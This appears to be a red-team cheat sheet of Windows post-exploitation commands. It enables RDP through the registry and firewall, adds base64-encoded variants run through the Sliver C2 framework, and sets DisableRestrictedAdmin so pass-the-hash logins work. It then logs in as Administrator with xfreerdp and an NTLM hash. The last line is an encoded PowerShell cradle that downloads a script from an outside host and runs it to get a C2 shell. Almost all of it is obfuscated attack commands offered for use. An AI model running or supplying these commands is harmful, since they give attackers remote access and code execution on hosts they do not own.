Enable RDP

1) Enable RDP and allow its port

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"

2) Encoded commands within Sliver

sharpsh -- -e -c U2V0LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtMTTpcU1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XENvbnRyb2xcVGVybWluYWwgU2VydmVyIiAtTmFtZSAiZkRlbnlUU0Nvbm5lY3Rpb25zIiAtVmFsdWUgMCAtVHlwZSBEV29yZA0K
sharpsh -- -e -c bmV0c2ggZmlyZXdhbGwgYWRkIHBvcnRvcGVuaW5nIFRDUCAzMzg5ICJSZW1vdGUgRGVza3RvcCI=

3) Allow PtH login

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
sharpsh -- -c \"New-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\" -Name DisableRestrictedAdmin -Value 0\"

4) RDP as Administrator with PtH

xfreerdp /u:Administrator /pth:a293fe16548ddab726ed3ace8cdee7ba /v:10.10.100.10 /cert:ignore /dynamic-resolution

5) Once RDPed, open powershell as admin and run or use NXC to get shell on sliver

powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAwAC4AMQAxAC8AaABhAHYAMABjAC0AcABzAC4AdAB4AHQAJwApACAAfAAgAEkARQBYAA==